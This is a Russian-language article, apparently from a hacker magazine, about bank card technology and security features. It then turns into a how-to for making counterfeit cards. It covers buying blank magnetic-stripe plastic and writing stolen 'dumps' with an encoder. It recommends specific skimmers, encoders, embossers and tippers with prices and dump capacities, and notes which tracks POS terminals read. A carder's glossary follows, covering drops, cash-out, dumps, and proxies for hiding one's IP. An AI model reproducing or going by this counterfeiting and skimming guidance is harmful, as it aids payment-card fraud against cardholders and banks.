У чиповых карт множество преимуществ перед другими и лишь один недостаток. Первый плюс – надежное хранение информации. А это - один из определяющих факторов в финансовых операциях (деньги ведь никто не хочет терять). Хотя, как ты знаешь, непробиваемой защиты не существует. Потом, если в карточке используется микросхема, то креда может сама принять решение о правомерности выполняемой сделки. К недостаткам можно отнести, разве что, сравнительно высокую стоимость производства карты.
Чиповые карты делятся на карты с памятью и карты с микросхемой.
Больше всего сейчас распространены креды с памятью (это самый простой вариант чиповой карты).
Для хранения инфы используется EEPROM (electrically erasable programmable read-only memory - электрически стираемая программируемая память только для чтения). Для обеспечения безопасности финансовых операций, вся память разделена на несколько зон, каждая из которых защищена отдельно (каждая своим ключом, одна из них - твоим pin-кодом). Считыванием инфы и определением валидности карты занимается терминал.
Карты с микросхемой устроены значительно сложнее, и, соответственно, стоимость их производства намного выше. В кредах применяется 8-разрядный проц, а также имеется постоянная (ROM) и оперативная (RAM) память. Для хранения информации используется все тот же EEPROM. Рабочий софт (некое подобие операционки) прошит жестко и перезаписи не подлежит. Аппаратная криптографическая защита построена обычно на алгоритмах RSA (Rivest-Shamir-Adleman) или DES (Data Encryption Standard) - про них ты наверняка много раз читал в Хакере.
Конечно, никаких элементов питания на карте не предусмотрено, поэтому креда «включается» только тогда, когда на нее терминалом подается рабочее напряжение (через контакты чипа).
Одним из бонусов креды с микросхемой является электронный кошелек. Он реализован аппаратно и представляет собой особый файл в памяти, содержащий сведения о количестве средств на счете. Для доступа к кошельку необходимо знать pin-код. При добавлении или списании средств со счета, соответственно изменяется файл.
Для большинства чиповых кред используется спецификация EMV, разработанная крупнейшими платежными системами: Europay, MasterCard и Visa.
При всем этом, кредитка может выполнять и дополнительные функции. Например - играть роль бесконтактного проездного в метро (кстати, такие креды иногда выдают студентам даже в наших вузах).
В последние время стали продвигаться всевозможные проекты девайсов для бесконтактного использования контактных кред (например, при помощи Bluetooth). Т.е. ты вставляешь кредитку в небольшой переходник и при оплате карточку доставать уже не нужно. Переходник сам обменяется всеми необходимыми данными с электронным терминалом. Так как все данные передаются по радиоканалу, то нет никакой гарантии, что их никто не перехватит. Поэтому весь трафик шифруется (при помощи ключей, которые передаются только на этапе персонализации карточки). Это, конечно, выглядит довольно ненадежно, но что поделаешь – всем хочется удобства.
Щит и меч
Физическая (иногда ее еще называют полиграфической) защита кредитки состоит из нескольких частей. К ней относятся, например: голограмма, полоса для подписи, фотография владельца, скрытые рисунки/надписи и микрошрифт. Давай остановимся на этом поподробнее.
Голограмма. Голограмма производится из нескольких соединенных слоев фольги, нередко на нее еще и эмбоссируется часть текста, что затрудняет попытки изготовить подделку креды. К примеру, на голограмме Визы изображен голубь, который вращает головой и машет крыльями, на МастерКарде – красочный глобус и карта мира. Долгое время точно подделать голограмму не могли, сейчас и это – уже не проблема.
Полоса для подписи. Полоса для подписи расположена на реверсе креды. Фоном полоски служит асимметричный и/или сложный рисунок, она изготовлена из соответствующего материала, препятствующего стиранию и смыванию подписи. Необходимо, чтобы подпись полностью соответствовала подписи на документе, удостоверяющем личность владельца. В некоторых случаях на полосе еще выжигается лазером номер карты.
Фотография владельца. Также расположена на реверсе. Фотка – самый простой способ проверить, являешься ли ты владельцем.
Скрытые рисунки/надписи. Обычно на карточку наносятся специальными красками скрытые рисунки, невидимые невооруженным глазом. Такие рисунки видны либо в ультрафиолете, либо через специальные фильтры.
Микрошрифт. Печать микрошрифтом - еще один вид защиты. Текст, напечатанный микрошрифтом, практически неразличим невооруженным глазом – высота каждой буквы около 1/5 мм. Например, на карточке Visa Electron текст, напечатанный микрошрифтом, находится по периметру логотипов Visa и Electron.
Защита кредиток усложняется по мере их распространения. Производители придумывают все новые виды защиты, и они все постепенно обходятся. С масштабным введением нового вида карт возникает много сложностей, учитывая, сколько миллионов человек сейчас пользуются кредитками (у всех надо кредитки изъять и выдать новые). Сейчас полиграфическая защита переживает определенный кризис, рынок подделок принимает критические размеры, банки терпят от кардерства большие убытки. Единственной надеждой остается переход на смарт-карты с аппаратной реализацией криптографической защиты.
Как нас подделывают
Несмотря на столь серьезную защиту, подделок очень много. Многие фальшивки делаются буквально на коленке, и их качество оставляет желать лучшего, но встречаются и практически неотличимые от настоящих. Кстати, по количеству подделок Россия - признанный лидер.
Самый распространенный и самый качественный вид подделок – так называемый «белый пластик». Используется он так: данные о владельце карты наносятся на девственно чистые креды (болванки). Иногда номера на карточке перебиваются (срезаются/наклеиваются) и такой метод из-за своей популярности даже получил название shave & paste (срезать и наклеить). Понятно, что все подобные действия уголовно наказуемы (срок могут дать немалый).
Как видишь, креда - это не просто пластмассовая пластинка. Кредитки постоянно совершенствуются (уже сейчас креда напоминает миниатюрный компьютер), производители объединяют усилия для борьбы с подделками. Чем все это закончится – посмотрим, но кредитки были, есть и будут.
В 1976 году Americard сменила имя на Visa (для выхода на мировую арену), а в 1980 году MasterCharge – на MasterCard. За несколько лет эти платежные системы стали крупнейшими в мире (в банковской среде) и не собираются сдавать позиции.
На сегодня существуют кредитки только одного стандарта – ID-1, другие просто (пока или уже) не используются. Этот стандарт определяет все до сотой доли миллиметра, каждый элемент креды должен находиться точно на своем месте и в полной мере выполнять возложенную на него функцию.
При производстве особое внимание уделяется безопасности на этапе персонализации карточки (нанесение идентификационных данных владельца и прошивка памяти микросхемы (энкодинг)).
К защитным механизмам креды относятся: голограмма, полоса для подписи, фотография владельца и микрошрифт.
Сделай кредитку своими руками
В отличие от детей, кредитные карты делать гораздо сложнее. Кроме навыков и опыта, нужны и соответствующие девайсы. Основные принципы изготовления черпай из статьи, а остальное уже на практике.
Что нужно для производства карт
Все начинается с исходного материала, собственно, подложки любой карточки. В народе для простоты называется пластиком или картоном. Купить пластик нужного размера с вклеенной магнитной полосой сейчас не проблема. Покупать стоит белый пластик, это позволит сэкономить на краске для принтера.
Чтобы из купленного пластика сделать полноценную карту, тебе придется помучиться со специальным оборудованием. Начинается все, как ты понимаешь, с печати изображений на карте. Для небольших тиражей (до 1000 штук) используется метод сублимационной печати.
Чтобы получить качественное изображение, которое не стыдно продемонстрировать своей девчонке или сокурсникам, тебе понадобится специальный принтер для печати на пластиковых картах. При выборе принтера надо внимательно изучить его характеристики. Принтеры делятся на следующие группы: монохромные и полноцветные, односторонние и двухсторонние (на двухстороннем можно печатать сразу обе стороны за один проход). Большинство принтеров имеют встроенные или опциональные (с возможностью докупить нужный блок) дополнительные функции: ламинатор, энкодер, эмбоссер, типпер, а также устройство для вклеивания голограммы и полосы подписи.
С последней функцией более или менее ясно, расскажу про остальные. Ламинатор требуется для того, чтобы после печати покрыть изображение специальной защитной пленкой, этот несложный процесс называется ламинацией. Энкодер поможет тебе записать дамп на магнитную карту, эмбоссер выдавит инициалы и "секретную" комбинацию цифр прямо на карте, а типпер (не путай с триппером) окрасит эмбоссированные символы.
Технология по шагам
Для изготовления полноценной карты надо реализовать несколько нехитрых операций:
Советы бывалого
С принтером все просто - главное, чтобы его разрешение было не менее 300dpi, он мог печатать без полей и не отрыгивал карты толщиной 0,75 миллиметра. Если принтер не соответствует хотя бы одному из перечисленных параметров, забудь о его существовании.
Не помешает поинтересоваться стоимостью расходных материалов, так как впоследствии это может вылиться в забавную сумму. Помимо стоимости, необходимо также поинтересоваться доступностью этих материалов, чтобы не летать потом за ними в Африку. Понятно, что noname всегда дешевле, но все же советую приобретать оборудование известных фирм. Лидеры в производстве сублимационных и термотрансферных принтеров - это Eltron и Fargo. Покупать только оригинальные (читай - родные) расходные материалы или нет - дело вкуса, но с родными качество гарантировано.
С эмбоссерами вообще элементарно. Здесь получаемое качество практически одинаково для всех моделей, цена зависит лишь от производительности и бренда. Самый простой - это ручной эмбоссер, не требует электропитания и прост в обращении.
При покупке типпера, так же, как в случае с принтером, уточни стоимость и доступность фольги именно для этой модели. А отдельный ламинатор вообще не нужен, проще купить принтер или эмбоссер со встроенным ламинатором. Отдельно ламинатор обойдется дороже, а времени на изготовление одной карты уйдет больше.
Энкодеры умеют записывать два вида карт - high и low coercivity. По сути, это высокая и низкая намагниченность. Имеет смысл купить энкодер, понимающий любые карты. И отдельное замечание по поводу траков - не гонись за энкодером, который записывает все три трака (магнитная полоса имеет три области, называемые траками). Третий трак не читается практически ни одним ПОС-терминалом и уж тем более банкоматами. Так стоит ли переплачивать за бесполезную навороченность? Такой энкодер может понадобиться лишь для выпуска кредитных карт, дающих владельцам определенные скидки.
TA-32 (скимер)
Цена: 1200 зеленых
Память: 512 Кб (около 3000 дампов)
Траки: считывает 1, 2, 3
Питание: встроенная литиевая батарея, 50 часов беспрерывной работы
Подключение: USB
Размеры: 8,25х2,03x2,67 см
Все: 49 граммов
Характеристики
Описание: этот ридер отличается хорошей работоспособностью, позволяет на лету считывать карты любой толщины и с любой плотностью записи. Позволяет считывать в обе стороны и с любой скорость. Термоустойчив, работает при температуре от 0 до 60 градусов. В комплекте идет программное обеспечение. Корпус сделан из суперпрочного пластика ABS, специально для тех, у кого трясутся руки.
PMR-202 (скимер)
Цена: 1190 зеленых
Память: 128 Кб (около 1000 дампов)
Траки: считывает 1, 2
Питание: встроенная литиевая батарея, 50 часов беспрерывной работы
Подключение: USB
Размеры: 4,6х3x3,08 см
Вес: 54 грамма
Характеристики
Описание: из фишек этого скимера можно отметить автоматическое отключение питания при долгом простое, защиту от нежелательных пользователей (защита паролем от несанкционированного доступа). В комплекте идет ПО для работы со скимером.
AMC-772 (энкодер)
Цена: 1000 зеленых
Траки: записывает и считывает 1, 2
Подключение: USB
Вес: 1,33 кг
Характеристики
Описание: один их самых надежных, а следовательно, популярных энкодеров. Подключается к USB, что актуально в последнее время. Жизнеспособность магнитной головки составляет около миллиона проводок, тебе этого хватит и еще останется детям. В наборе идет стандартное ПО.
Matica Z1 (эмбоссер)
Цена: 4700 зеленых
Размеры: 43х40x17 см
Вес: 17 кг
Характеристики
Описание: идеальное решение, проверенное временем. Компактность, приятный дизайн, небольшие размеры и тихая работа. Z1 имеет автоматическую загрузку карт (на выходе готовые карты помещаются в выходной лоток для максимальной экономии пространства), внутреннюю систему диагностики и ЖК-дисплей, обеспечивающий непрерывный контроль работы. Рекомендуемая производительность: 300-500 карт в день. Совместим с окошками, подключение через USB.
Matica Z Tipper (типпер)
Цена: 1990 зеленых
Размеры: 25х25x20 см
Вес: 3 кг
Характеристики
Описание: Matica Z типпер - одиночное устройство для окрашивания эмбоссированных карт (точнее выдавленных символов на них). Чрезвычайно компактные размеры позволяют установить девайс в любое место. Очень прост в работе, задается необходимая температура и прижим для получения идеального результата. Жидкокристаллический дисплей, которым оснащен этот типпер, показывает текущее состояние машины и температуру. Кроме того, функция энергосбережения приводит к пониженному потреблению энергии при простое машины в режиме ожидания. Лента для окрашивания может быть различного цвета. Установка и замена картриджа для загрузки ленты производится элементарно. Скорость окрашивания составляет всего несколько секунд на одну карту!
Eltron P210i (принтер)
Цена: 2195 зеленых
Размеры: 12,5x17x24 см
Все: 3 кг
Характеристики
Описание: Eltron P210i может использоваться для печати удостоверений, предпечатных карт в цвете или монохромно. Годится для односторонней печати без полей. Штампует великолепного качества карты с разрешением 300 dpi, позволяет наносить штрихкоды, фотографии, графику или текст. Тихий в работе, маленький и легкий. Есть модификация с кодировщиком магнитной полосы. P210i поставляется с двойным интерфейсом для простоты интеграции в любой системе: USB и Parallel, либо USB и Serial.
Словарь кардера!
Авторизация - проверка и определение полномочий на выполнение некоторых действий. Разрешение, предоставляемое эмитентом для проведения операции с использованием банковской карты. В процессе авторизации данные о карточке и о запрашиваемой сумме передаются в банк-эмитент, где проверяется состояние счета клиента.
Аккаунт (акк, account) - счет.
AmericanExpress (AmEx) - международная платежная система, номер карты начинается с 34 или 37 и состоит из 15 цифр.
ATM - Банкомат - устойчивое к взлому банковское защитное средство, предназначенное для: выдачи и приема наличных денежных средств; составления документов по операциям с использованием банковских карт; выдачи информации по счету; осуществления безналичных платежей и т.д. Банкомат оснащен процессором, дисплеем, клавиатурой и ридером, предназначенным для считывания информации с карточки.
BIN - первые 6 цифр номера банковской карты, которые определяют выдавший карту банк и ее тип (классик, голд и т.д.).
Card number - номер карточки - уникальный набор цифр, наносимый на карточку в результате эмбоссирования, а также записываемый в память на магнитную полосу или в микросхему.
Card owner - владелец карточки - организация-эмитент банковской карточки.
CVV (Card verifikation value) - проверочное значение для номера карты, находится в дампе.
CVV2 - код дополнительной безопасности, находится на задней стороне кары, обычно состоит из 3 цифр.
DL (driver license) - водительские права (англ.).
Expiration date (exp. date) - срок годности карты, есть на самой карте и в дампе.
VISA - международная платежная система, номера карт начинаются с 4. Сайт.
Вестерн Юнион (Western Union) - международная система денежных переводов.
Ваер (Wire transfer) - банковский перевод.
Gold credit card - золотая кредитная карточка - престижная платежная карточка, предоставляющая держателю приоритетный статус, высокий лимит кредитования, автоматическое страхование и другие привилегии.
Дебетовая (дебитная) карта - карта, пользоваться которой можно только в пределе имеющейся на счету суммы.
Дроп - человек, который берет на себя (осознанно или неосознанно) грязную часть работы. Принимает денежные переводы, предоставляет счет для проведения операций другими людьми и т.д.
Кардер - человек, использующий информацию с чужой банковской карточки для получения денег.
Кардинг - получение денег, благодаря использованию информации с чужой банковской карточки.
Картхолдер - держатель банковской карты, физическое или юридическое лицо.
Кидала (Ripper) - человек, кинувший кого-то из кардеров.
Кредитная карта - карта, на которую можно покупать в кредит, т.е. не имея на счете достаточно денег. Размер кредита определяет банк-эмитент.
MasterCard - международная платежная система, номера катр начинаются с 5.
MoneyGramm - система быстрых денежных переводов.
Мыло - E-mail, адрес электронной почты.
Обнал - превращение виртуальных денег в реальные.
PAN - номер банковской карты, чаще всего 16-и значный.
Платежная система - ассоциация банков и компаний, работающих по общим правилам использования карточек. Основу платежной системы составляет совокупность нормативных, договорных, финансовых и информационно-технических средств, а также решений участников, которые регламентируют свои взаимоотношения относительно порядка использования карточек. В платежной системе существуют несколько статусов членства: полное, частичное и т.д. Все карточки, которые принадлежат к одной платежной системе имеют признаки, позволяющие идентифицировать их принадлежность к этой платежной системе.
Prepaid card - карта с предварительно оплаченной суммой - смарт-карта, в которой хранятся электронные деньги, заранее оплаченные владельцем карты.
Скан - просканированый документ, фотография, банковская карта и т.д.
Транзакция - банковская операция, состоящая в переводе денежных средств с одного счета на другой.
Юзать - использовать.
Реальный кардинг.
Банк-эмитент - банк, выдавший банковскую карту.
Corporate card - корпоративная карточка - банковская карточка, которая позволяет ее держателю проводить операции по счету юридического лица. Ответственность перед банком по этому счету несет юридическое лицо.
Valid date - дата действия - число, впечатанное на банковской карточке, начиная с которого карта становится действительной.
Голограмма - голографическая наклейка наносимая впрессовыванием под большой температурой в карточку. Голограмма служит дополнительной степенью защиты от поделок и является обязательным атрибутом банковских карточек.
Дамп (Dump) - информация с магнитной полосы банковской карты. ??спользуется для записи на пластик определенного стандарта для дальнейшего использования в магазине. см. подробнее: здесь.
Electronic Purse - смарт-карта, в которой хранится цифровая наличность. Такая карта позволяет расходовать электронную наличность, создает запись о каждом платеже и позволяет перевести в цифровую наличность деньги с банковского счета.
Ламинатор - устройство для покрытия банковских карт защитной пленкой. см. подробнее: здесь
PIN-kod - код, используемый для авторизации, при помощи которого можно осуществлять операции с банковской карточкой, например: снимать наличные.
Пластик - чаще всего реальные или поддельные пластиковые банковские карточки, также любой пластик, на который можно записать дамп. см. подробнее: здесь, или:здесь.
Пластиковая карточка - пластина стандартных размеров 85.6 х 53.9 х 0.76 мм, изготовленная из устойчивой к механическим и термическим воздействиям пластмассы, является носителем информации.
POS-терминал - электронное устройство, позволяющее считывать информацию с магнитной полосы или чипа карточки и осуществлять связь с банком для проведения авторизации с целью осуществления операции по банковской карточке.
Реальный кардинг - использование информации с чужой банковской карты в реальных магазинах. Как правило для этого используют дампы, записанные на пластик.
Ридер - устройство для чтения магнитной полосы банковской карты. см. подробнее: здесь.
Смарт-карта - банковская карта с чипом, кредитная карточка со встроенным микропроцессором, обладающая высоким уровнем защиты и возможностью проводить многовалютные расчеты. см. подробнее: здесь
Слип - чек, который выдает POS-терминал.
Shopping - поход по магазинам.
Типпер - прибор для окрашивания эмбоссированных символов. см. подробнее: здесь.
Транзакция - совокупность операций взаимодействия держателя карточки с процессинговым центром при осуществлении платежа по карточке или при получении наличности.
Транзакция изменяет состояние карточного счета держателя карточки.
Трек - одна из дорожек на магнитной полосе банковской карты в виде текстового файла, всего их 3.
Эмбоссер - устройство для выдавливания символов (например номера карты) на пластике. см. подробнее: здесь
Энкодер - устройство для записи на карточки с магнитной полосой (пластик) и чтения их. см. подробнее: здесь
Итернет-кардинг.
Адалт (адульт) - порно-сайт
BidPay - платежная система, которая позволяет человеку, купившему что-либо на аукционе, заплатить за его покупку. Это платежная система, которая позволяет безо всяких проблем сделать MO при помощи карты.
Billing - платежная система.
еБей (еБай) - название интернет аукциона eBay.
Bitcoin - криптовалюта.
Интернет-кардинг - использование данных с чужой банковской карты для осуществления всевозможных операций в интернете, с целью получения денег.
Карта (картон, картофель, КК, СС) - номер банковской карточки. ??спользуется для покупок в интернете. Бывает с кодом cvv2 и без.
Мерчант - торговый счет, на который поступают деньги за проданный товар, система торговли он-лайн.
Палка - система денежных переводов PayPal.
Порник - порно-сайт.
Прокси - функция сервера, которая позволяет пользователю работать от его имени.
SalesCart - пакет электронной коммерции, интегрированный с Microsoft FrontPage, предоставлющий возможность осуществлять покупки в Сети.
Сокс (Sоcks-proxy) - сервер посредник между вашим компьютером и конечным сайтом, используется чтобы скрыть IP.
Спам - масштабная рассылка писем по электронной почте.
SSN (social security number) - номер, который дается каждому жителю США для удобней его налогообложения и отслеживания кредитной истории.
Чарджбек - отзыв банком (кардхолдером) платежа, в отношении которого есть сомнения.
Энролл - связь кредитной карты (счета) с он-лайном с возможностью узнавать и менять данные через интернет.
IP - интернет адрес, состоит из четырех чисел, разделенных точкой, каждое из которых может быть от 0 до 255. Определяет местонахождение пользователя.
WebMoney - платежная интернет-система.
Распространенные сокращения.
Акк, Acc - аккаунт.
АмЕх - American Express.
CC - Карта.
CC-номер - Номер кредитной карты (cc - аббревиатура: credit card)
CVV - Card Verification Value. – определенный номер для проверки подлинности карты. С появлением электронных терминалов мошенники сосредоточились на подделке или изменении информации, хранящейся на магнитной полосе. Для борьбы с такими нарушениями специалисты VISA разработали CVV
Dl - driver licenze.
Exp. date - Expiration date.
КК - карта.
MG - Money Gramm.
MO - Money Order.
SSN - Social security number.
WM - WebMoney.
WU - Western Union.
ABA Routing Number – уникальное девятизначное число, обычно ставится в нижней части чека перед номером счета (обрамленное двоеточиями). Позволяет однозначно определить банк, где находится сумма, на которую выписан чек.
Acquirer (Acquiring Bank) – банк или финансовая организация, осуществляющая весь спектр операций по взаимодействию с точками обслуживания банковских карт, которая состоит из терминалов в торгово-сервисной сети и банкоматов. При получении данных о произведенных операциях в сети, эквайрер направляет их в систему для проведения соответствующих расчетов. Эквайрер отвечает за возмещение средств торговым точкам, в которых производились покупки или оплачивались услуги с помощью карт.
Address Verification Service (AVS) – операция проверки адреса, куда поступает счет за приобретенный товар.
Approval - подтверждение, код, посылаемый банком-эмитентом в подтверждение того, что пластиковая карта покупателя существует, пригодна к пользованию и запрашиваемая сумма находится в пределах допустимого лимита. Подтверждение запрашивается в процессе операции авторизации.
Automated Teller Machine (ATM) – устройство, предназначенное для получения наличных по пластиковой/smart-карте.
Authorization – авторизация, требование оплаты. Процесс авторизации блокирует деньги на счету, уменьшая свободную для расходования сумму. Чтобы осуществить снятие денежных средств, необходимо завершить процесс авторизации. Если за время, которое определяется эмитентом, процесс авторизация не завершается, она отменяется и ранее заблокированная сумма освобождается для расходования.
Authorization Code - код авторизации. Код, состоящий из букв и цифр, посылаемый банком-эмитентом (Сard Issuer), подтверждающий авторизацию. Код авторизации обязательно включается в чек (Sales Draft), выписываемый продавцом.
Bank Identification Number (BIN) - цифры на пластиковой карте, однозначно определяющие банк-эмитент (Issuing Bank). Обычно это первые шесть цифр, которые часто называют бином.
Batch - набор транзакций, сохраняемый для одновременной оплаты, которая происходит обычно раз в день. Batch можно завершить как автоматически, так и с помощью POS-терминала.
Batch Processing - тип обработки данных, при котором определенная совокупность транзакций обрабатывается единовременно.
Billing Address – фактически адрес, на который поступает счет за приобретенный товар.
Capture - решение, о представлении определенной транзакции к оплате. Все транзакции, представленные к оплате, включаются в Batch и направляются процессору платежей или платежному шлюзу.
Сard Issuer – организация, ответственная за выпуск и обслуживание пластиковых карт.
Card-Not-Present – ситуация, когда продавец не имеет возможности видеть покупателя, и ему физически недоступна пластиковая карта, то есть он не имеет возможности считать информацию с магнитной полосы, проверить подпись, посмотреть голограмму и т.п. Чтобы повысить надежность оплаты в этом случае используется система Address Verification Service.
Card Unblocking - операция обратная блокированию (Card Blocking).
Certification Authority - организация, которой доверено выдавать сертификаты открытых ключей.
Chargeback – операция возврата платежа. Сумма, которую вычитают со счета продавца по требованию владельца пластиковой карты. Если признана правота владельца карты, у продавца со счета вычитают сумму платежа плюс комиссию за ChargeBack (Chargeback Fee). Операция ChargeBack инициируется эмитентом после того как эквайрер завершил транзакцию.
Сhargeback Reason Code – двузначное число, которым кодируется причина возврата платежа.
Check Guarantee - способ, гарантирующий оплату по чеку в пределах суммы, установленной для конкретного счета.
Chip Сard – смарт-карта (также IC – integrated circuit card). Пластиковая карта, внутри которой находится микропроцессор, способный хранить «электронные деньги».
Сlose Batch - передача транзакций с кодами авторизации процессору платежей с целью перевода денег на счет продавца.
Commerce Server – Интернет-сервер, подключенный к процессору платежей, имеющий все необходимое для их принятия: программное обеспечение, хранящее информацию обо всех покупках и общую сумму цен, базу данных и т.д. Commerce Server обычно позволяет установить соединение по одному из защищенных протоколов, например, SSL.
Confirmation Letter – электронное письмо, посылаемое продавцу процессором платежей и содержащее сведения о представленных процессору Batch-файлах.
Credit Card - пластиковая карта, показывающая, что ее владельцу открыт кредит в организации-эмитенте. Это позволяет владельцу совершать покупки или получать деньги в банкомате в пределах установленного договором между держателем и эмитентом максимального лимита.
Credit Card Processors (Third Party Processors) - организация, обычно нанимаемая банком-эквайером , для предоставления услуг по процессингу платежей.
CVV2/CVC2 - это контрольный номер, состоящий из трех цифр, который напечатан на обратной стороне банковской карты. Данный номер отображается в верхнем правом углу специальной полсы для подписи. Ввод номера помогает убедиться, что карта используется настоящим владельцем. CVV2 классификация используется для карт VISA. CVC2 классификация используется для карт MasterCard.
Debit Card – дебетовая банковская карта. В отличие от кредитной карты, суммы, потраченные покупателем, автоматически вычитаются с его счета. Для оплаты дебитной картой обычно требуется PIN
Decline – операция отказа эмитента в авторизации платежа.
Demand Deposit Account (DDA) – стандартный счет (checking account), куда могут быть переведены денежные средства.
Deposit - момент, когда продавец формирует (закрывает) Batch-файл и посылает транзакции для завершения.
Deposit Bank - банк, куда посылаются денежные средства продавца, снятые с карточных счетов покупателей.
Digital Signature - цифровая подпись. Последовательность символов, получаемая методами несимметричной криптографии (Public Key Cryptography), присоединяемая к сообщению и подтверждающая его аутентичность.
Digital Wallet -цифровой бумажник. Программа для оплаты товара по пластиковой карте. Перед тем как купить что-то, покупатель регистрируется в платежном шлюзе, получает имя и пароль, после чего может совершать покупку на любом web-сайте, поддерживающем данный тип цифрового бумажника.
Discount Rate - процент, взимаемый банком-эквайером c продавца за каждую покупку.
E-Commerce - электронная коммерция, определенный род деятельности, осуществляемый с использованием электронных средств связи.
Electronic Data Interchange (EDI) - глобальная компьютерная сеть, отделенная от Интернета, используемая банками и другими финансовыми организациями для проведения платежей.
Electronic Data Capture - использование POS-терминала для авторизации и передачи транзакций процессору банковских карт или иному MAP. Роль POS-терминала может играть специальная программное обеспечение или платежный шлюз (Payment Gateway).
Electronic Cash Register (ECR)- электронный кассовый аппарат, другими словами, комбинация кассового аппарата и POS-терминала. Часто ECR - это программное приложение, установленное на персональном компьютере
Electronic Draft Capture (EDC) - система, в которой транзакции передаются из разных мест на центральный компьютер (Host Computer ) для хранения и обработки. Накопленные за период транзакции затем передаются процессору платежей.
Electronic Money (e-money) - цифровая наличность. Хранится в электронном виде в компьютерах или микропроцессорах. Находится в распоряжении покупателя. Цифровая наличность может быть куплена и сохраняться в специальном накопительном устройстве.
Electronic Purse – smart-карта, на которой хранится цифровая наличность (e-money).
EMV-specification – единые международные требования к микропроцессорным карточкам, описывающие требования к карточке, терминалу и процессу обмена информацией между карточкой и терминалом.
Factoring - ситуация, когда собственный номер идентификации предприятия торговли/услуг в платежной
системе (Merchant Account) используется для приема платежей за дополнительную комиссию для нужд другого продавца. Данная деятельность считается нелегальной.
Floor Limit - если цена товара ниже Floor Limit, продавец может обойтись без авторизации (убедившись, что карта не помещена в список потерянных или украденных). Floor Limit обычно устанавливается эмитентом.
Front-End – информация, которую видит покупатель на web-сайте продавца. Front-End позволяет покупателю взаимодействовать с электронной корзиной, базой данных, а также оплачивать покупки.
Holdback (Reserve Account) - часть средств, полученных продавцом от карточных платежей, блокируемая эквайрером или другим MAP, чтобы покрыть расходы на chargeback и другие спорные выплаты. По истечении определенного срока Holdback возвращается продавцу.
Host Capture - автоматическое составление Batch-файла в процессоре платежей или платежном шлюзе.
Host Computer -компьютер, осуществляющий авторизацию и завершение.
Imprint - считывание параметров карты. Может быть электронным (через POS-терминал) или ручным (получение оттиска карты с помощью импринтера). Imprint необходим для доказательства физического присутствия карты в месте покупки.
Interchange - поток информации между эмитентом и эквайрером, например, транзакции, возврат и т.д.
Interchange Fee – комиссия, которую платит банк-эквайрер банку-эмитенту за каждую операцию перевода с банковской карты. Данная комиссия является частью Discount Fee.
ISO (Independent Service Organization) – организация, помогающая продавцу принимать платежи по пластиковым картам. Прежде чем работать с ISO продавцы должны, как правило, уже иметь открытый Merchant Account.
Issuer (Issuing Bank) -эмитент, банк, выпускающий банковские карты и открывающий карточные счета для физических и юридических лиц.
Key - ключ, набор цифр, используемый в криптографическом алгоритме.
Key length - длина ключа (Key), измеряемая в битах.
Limited-purpose prepaid card - смарт-карта, которую можно использовать только в строго определенных точках продаж товаров или услуг.
Load – операция по загрузке цифровой наличности в цифровой кошелек.
Load Log – запись о последней загрузке цифровой наличности в цифровой кошелек.
Local Review – способность продавца видеть со своего терминала или ECR содержимое Batch-файла до или после завершения транзакции.
Locking (Card Blocking) - блокирование smart-карты, предотвращающее ее дальнейшее использование.
Magnetic Stripe – магнитная полоса. Располагается с обратной стороны пластиковой карты и содержит в закодированном виде информацию о карточном счете, связанном с данной картой.
Manual Entry (Keyed Entry) – операция ручного ввода параметров карты с клавиатуры компьютера или POS-терминала.
Member - финансовое учреждение - член ассоциации международной платежной системы.
Merchant – юридическое лицо, принимающее платежи по пластиковым картам.
Merchant Account - уникальный номера идентификации предприятия торговли/услуг в платежной системе, который позволяет принимать платежи по банковским картам. Регистрируя Marchant Account, банк соглашается оплачивать предприятию торговли/услуг правильно совершенные сделки (покупки) в обмен на снятие средств со счетов покупателей в банках-эмитентах.
Merchant Account Provider (MAP) - организация, открывающая Merchant Account.
Merchant Agreement - письменное соглашение между продавцом и банком (возможно, между продавцом, банком и ISO), устанавливающее права, обязанности и гарантии сторон в процессе приема карточных платежей.
Merchant Bank -банк, в котором открыт Merchant Account.
Merchant Category Code - код, который банк-эквайрер присваивает продавцу. Данный код, обычно состоящий из четырех цифр и называемый иногда Sic Code, отражает основное направление деятельности продавца.
Micropayment – микроплатеж, очень маленькая сумма, возможно, меньше цента.
MID (Merchant Identification Number) – число, однозначно определяющее продавца в платежной системе.
Monthly Minimum – минимальная месячная плата, которую удерживают с продавца за прием платежей по пластиковым картам.
MOTO Discount Rate (Mail Order / Telephone Order) - комиссия, которая удерживается эквайрером с каждой транзакции в случае, когда продавец не имеет доступа к самой карте, зная лишь ее параметры, сообщаемые ему по телефону, факсу или Интернету.
Non-Qualified – обозначение транзакции, характеризующейся повышенным риском (например, в с случае, когда транзакция осуществляется с помощью передачи параметров банковской карты при физической невозможности доступа к ней).
Off-line – обозначение состояния системы, когда между участниками платежной системы нет непосредственной связи.
On-line – обозначение состояния системы, когда перед выполнением транзакции идет соединение с центральным компьютером для авторизации в режиме реального времени.
Open To Buy - размер кредита, доступного в данный момент владельцу карточного счета
Payment Gateway – платежный шлюз. Обычно Интернет-сервер с установленным на нем программным обеспечением, вязывающим web-сервер продавца с процессором платежей.
Payment System - платежная система. Набор банковских процедур и систем межбанковского перевода денежных средств.
Pc Pos Application – компьютерная программное приложение, которая объединяет любые две функции из списка: кассовый аппарат, учет ценностей, бухгалтерская программа, программа для авторизации и приема платежей по кредитным картам.
PIN (Personal Identification Number) – цифровой или алфавитно-цифровой код, доступный лишь владельцу карты. Используется при операциях с карточным счетом, привязанном к данной банковской карте.
POS Terminal (Point of Sale) – электронный прибор, используемый для авторизации и проведения платежей по банковской карте.
Post Authorization - транзакция, которой предшествует голосовая авторизация.
Prepaid card – smart-карта, в которой хранятся электронные деньги, заранее оплаченные владельцем карты.
Prior Authorized Sale – транзакция, для которой сначала проводится авторизация. Продавец авторизует карту, прежде чем предоставить продукт/услугу.
Private Key – секретный ключ, доступ к которому должен иметь только его владелец. Секретному ключу соответствует открытый ключ.
Processor – процессор платежей, компьютерный центр, производящий операции по обработке платежей по банковским картам
Public Key - открытый ключ, несекретная часть пары двух ключей в асимметричной криптографии
Public Key Certificate –сертификат открытого ключа. Информация об открытом ключе, как правило, включающая сам ключ, подписанная цифровой подписью физического лица или организации. Сертификат защищает целостность ключа, если человек или организация, подписавшие его, хорошо известны, а их открытые ключи широко распространены.
Public Key Cryptography – схема шифрования, не требующая конфиденциального канала для установления конфиденциальной связи. Чтобы послать конфиденциальное сообщение, необходим только открытый ключ получателя, который расшифрует полученное сообщение своим секретным ключом.
Public Key Encryption – метод шифрования, разработанный с целью преодоления основного недостатка симметричной криптографии - необходимости иметь надежный канал для передачи ключа адресату.
